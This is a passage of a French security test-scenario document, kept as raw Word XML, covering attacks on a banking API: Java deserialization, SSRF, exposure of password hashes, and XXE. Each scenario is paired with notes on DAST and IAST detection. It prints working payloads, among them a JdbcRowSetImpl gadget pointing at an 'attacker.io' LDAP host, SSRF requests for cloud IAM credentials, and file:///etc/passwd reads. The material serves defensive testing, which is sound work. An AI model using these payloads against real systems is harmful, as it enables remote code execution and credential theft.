              <w:t xml:space="preserve">      |  JdbcRowSetImpl,   |                    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  dataSourceName:   |                    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  ldap://evil.io}   |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  ObjectMapper      |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                   |  .readValue(payload)|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                   |-------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                   |    Gadget chain -&gt; RCE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/api/v1/transfers HTTP/1.1</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w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "@class": "com.sun.rowset.JdbcRowSetImpl",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "dataSourceName": "ldap://attacker.io:1389/exploit",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  "autoCommit": true</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserv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PARTIEL</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Envoie des payloads gadget chain connus (Jackson, Fastjson, XStream) et detecte des comportements anormaux. Limite : sans IAST difficile de confirmer l'execution reelle.</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Territoire d'excellence IAST : detecte enableDefaultTyping() active, absence de SafeDeserializationHandler. Finding avec class name + stack trace complete.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SC-06 — Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API7:2023 / A10:2021  |  CWE-918</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Une API de previsualisation de lien effectue une requete HTTP cote serveur vers l'URL fournie sans validation. Un attaquant cible les metadonnees cloud ou des services internes non exposes.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/preview-url    Service interne / Cloud metadata</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/preview |                        |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  url:          |                        |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  169.254.169.254|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  GET http://169.254... |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |               |-----------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |               |  IAM credentials JSON  |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |               |&lt;-----------------------|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  200 + creds   |                        |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |&lt;--------------|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/api/v1/links/preview HTTP/1.1</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application/json</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"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/" }</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 Variantes a tester :</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># { "url": "http://localhost:8080/actuator/env" }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># { "url": "file:///etc/passwd"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Utilise un serveur OOB (interactsh, Burp Collaborator) pour detecter les requetes sortantes. Teste : metadata cloud, localhost, RFC1918, file://, gopher://. Detection meme si la reponse API ne contient pas les donnees SSRF.</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Trace : RequestBody.url -&gt; HttpClient.execute() / RestTemplate.getForObject() sans validation de l'URL (allowlist absente). Detecte l'absence de verification d'hote avant la requete sortante.</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SC-07 — Exposition de Hash Mot de Passe en Reponse API</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP API3:2023  |  CWE-312</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L'API de profil utilisateur retourne l'objet User complet serialise depuis la base de donnees, incluant le champ 'passwordHash'. Meme hache, cette exposition facilite les attaques offline.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Client / Attaquant    API /users/me        Base de donnees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GET /api/v1/users/me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  SELECT * FROM users|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |                    |-------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |                    |  {id, email,       |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |                    |   passwordHash,    |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |                    |   iban...}         |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |                    |&lt;-------------------|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |  200 + tous les champs DB           |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">         |&lt;--------------------|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GET /api/v1/users/me HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: api.banking.internal</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</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280F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">{  "id": 42, "email": "alice@bank.fr",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   "passwordHash": "$2b$12$LQv3c1yqBWVHxkd0LHAkCO...",</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">   "iban": "FR7630006000011234567890189"  }</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="56D364"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># passwordHash ET iban exposes - violation RGPD + DORA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Analyse les reponses JSON et detecte les patterns de hachage connus : $2b$ (bcrypt), $argon2$, sha256:, md5: ainsi que les noms de champs suspects (passwordHash, pwd_hash, hashedPassword). Regle configurable avec regex.</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Trace : ObjectMapper.writeValue() inclut le champ passwordHash depuis l'entite User sans @JsonIgnore. Detecte l'absence de DTO de projection (pattern DTO != entite DB).</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1513"/>
        <w:gridCol w:w="1513"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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SCENARIO SC-08 — XML External Entity (XXE) - Lecture fichier interne</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="A0C4F8"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP A03:2021  |  CWE-611</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1F4E79" w:sz="1"/>
              <w:left w:val="single" w:color="1F4E79" w:sz="1"/>
              <w:bottom w:val="single" w:color="1F4E79" w:sz="1"/>
              <w:right w:val="single" w:color="1F4E79" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1F4E79" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Severite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1513"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24"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7F4F24"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Contexte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Une API acceptant du XML en entree parse le document sans desactiver les entites externes. Un attaquant injecte une declaration DOCTYPE pointant vers un fichier systeme interne.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C2128" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  Attaquant      API /import (XML)    Systeme de fichiers</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                  |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  POST /import    |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  &lt;!DOCTYPE foo   |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  [&lt;!ENTITY xxe   |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  SYSTEM          |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  file:///etc/    |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  passwd]&gt;        |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |-----------------&gt;|                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                  |  Lecture /etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                  |------------------&gt;|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                  |  root:x:0:0:...   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |                  |&lt;------------------|</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |  200 + contenu   |                   |</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="E6EDF3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      |&lt;-----------------|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0363D" w:sz="1"/>
              <w:left w:val="single" w:color="30363D" w:sz="1"/>
              <w:bottom w:val="single" w:color="30363D" w:sz="1"/>
              <w:right w:val="single" w:color="30363D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="0A1628" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/v1/import/payments HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization: Bearer eyJhbGciOiJIUzI1NiJ9...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="79C0FF"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
